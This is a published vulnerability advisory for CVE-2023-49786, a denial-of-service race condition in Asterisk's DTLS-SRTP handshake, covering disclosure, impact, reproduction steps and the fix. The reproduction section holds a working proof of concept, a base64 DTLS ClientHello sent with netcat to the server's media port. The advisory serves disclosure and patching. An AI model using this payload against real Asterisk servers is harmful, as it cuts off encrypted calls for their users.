Headline
CVE-2023-49786: Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6.
- Fixed versions: 18.20.1, 20.5.1, 21.0.1,18.9-cert6
- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race
- Vendor Security Advisory: GHSA-hxj9-xwr8-w8pq
- Other references: CVE-2023-49786
- Tested vulnerable versions: 20.1.0
- Timeline:
- Report date: 2023-09-27
- Triaged: 2023-09-27
- Fix provided for testing: 2023-11-09
- Vendor release with fix: 2023-12-14
- Enable Security advisory: 2023-12-14
TL;DR
When handling DTLS-SRTP for media setup, Asterisk is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack.
Description
Our research has shown that key establishment for Secure Real-time Transport Protocol (SRTP) using Datagram Transport Layer Security Extension (DTLS)1 is susceptible to a Denial of Service attack due to a race condition. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as TLS_NULL_WITH_NULL_NULL) to the port on the Asterisk server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too.
This behavior was tested against Asterisk version 20.1.0, which was found to be vulnerable to this issue.
The following sequence diagram shows the normal flow (i.e. no attack) involving SIP, STUN and DTLS messages between a UAC (the Caller) and an Asterisk server capable of handling WebRTC calls.
In a controlled experiment, it was observed that when the Attacker sent a DTLS ClientHello to Asterisk’s media port from a different IP and port, Asterisk responded by sending a DTLS Alert to the Caller. Additionally, Asterisk terminated the SIP call by sending a BYE message to the Caller.
During a real attack, the attacker would spray a vulnerable Asterisk server with DTLS ClientHello messages. The attacker would typically target the range of UDP ports allocated for RTP. When the ClientHello message from the Attacker wins the race against an expected ClientHello from the Caller, the call terminates, resulting in Denial of Service.
Impact
Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP.
How to reproduce the issue
Prepare an Asterisk server with an extension configured to handle WebRTC; this may involve the following pjsip.conf and extensions.conf configuration updates:
pjsip.conf
[transport-tls-nat] type = transport protocol = wss bind = 172.17.0.2
[webrtc_client] type=aor max_contacts=5 remove_existing=yes
[webrtc_client] type=auth auth_type=userpass username=3456 password=3456
[3456] type=endpoint aors=webrtc_client auth=webrtc_client dtls_auto_generate_cert=yes webrtc=yes context=default disallow=all allow=opus,ulaw
extensions.conf
[globals]
[default] exten = _XXXX,1,Verbose(1, “User ${CALLERID(num)} dialed ${EXTEN}.”) same => n,Playback(demo-congrats) same => n,Hangup()
Send an INVITE message to the target server with WebRTC SDP:
INVITE sip:[email protected] SIP/2.0 Via: SIP/2.0/WSS 192.168.1.202:36742;rport=36742;branch=z9hG4bK-4RHtimOzaIkHeUDU Max-Forwards: 70 From: <sip:[email protected]>;tag=cnbsc3nNX2ydugl4 To: <sip:[email protected]> Contact: <sip:[email protected]> Call-ID: VaglTzNRBSuvPPdw CSeq: 5 INVITE Content-Type: application/sdp Content-Length: 563 v=0 o=- 1695296401 1695296401 IN IP4 192.168.1.202 s=- t=0 0 c=IN IP4 192.168.1.202 m=audio 36866 UDP/TLS/RTP/SAVPF 0 8 101 a=setup:active a=fingerprint:sha-256 49:05:98:B2:15:43:1C:9C:4F:29:07:60:F8:63:77:16:80:F9:44:C0:97:8E:E5:48:D6:71:B4:03:10:85:D6:E3 a=rtpmap:0 PCMU/8000/1 a=rtpmap:8 PCMA/8000/1 a=rtpmap:101 telephone-event/8000 a=ice-ufrag:IOZyOSQkVywevryI a=ice-pwd:UQUtRMZKFERnmZqQdaggFzJBhcWVxabr a=candidate:6249488300 1 udp 2130706431 192.168.1.202 36866 typ host generation 0 a=end-of-candidates a=rtcp-mux a=rtcprsize a=sendrecv
Note Asterisk’s media port and IP values, which will be used as the <asterisk-ip> and <media-port> parameters by the Attacker
When the call has been established, send a STUN binding request which has the appropriate Username, Message-Integrity and Ice-Controlled properties
When the Binding Success Response message is received, send a DTLS ClientHello message from a (attacker-controlled) host, which is different from the Caller but has network access to the Asterisk server
CLIENT_HELLO="Fv7/AAAAAAAAAAAAfAEAAHAAAAAAAAAAcP79AAA" CLIENT_HELLO="${CLIENT_HELLO}AAG4HCVaUNVbYVmxuqdn2WyCgtTijhZ+WheP/+H" CLIENT_HELLO="${CLIENT_HELLO}4AAAACAAABAABEABcAAP8BAAEAAAoACAAGAB0AF" CLIENT_HELLO="${CLIENT_HELLO}wAYAAsAAgEAACMAAAANABQAEgQDCAQEAQUDCAUF" CLIENT_HELLO="${CLIENT_HELLO}AQgGBgECAQAOAAkABgABAAgABwA=" echo -n “${CLIENT_HELLO}” | base64 --decode | nc -u <asterisk-ip> <media-port>
Observe that the Caller receives a DTLS Alert message and a SIP BYE message on its signaling channel
Note that the above steps are used to reliably reproduce the vulnerability. In the case of a real attack, the attacker simply has to spray the Asterisk server with DTLS messages.
Solution and recommendations
To address this vulnerability, upgrade Asterisk to the latest version which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check.
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Disclaimer
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Disclosure policy
This report is subject to Enable Security’s vulnerability disclosure policy which can be found at https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy.
- Datagram Transport Layer Security (DTLS) Extension to Establish Keys for the Secure Real-time Transport Protocol (SRTP) https://datatracker.ietf.org/doc/html/rfc5764 ↩
Related news
Debian Linux Security Advisory 5596-1 - Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.
When handling DTLS-SRTP for media setup, Asterisk version 20.1.0 is susceptible to denial of service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack.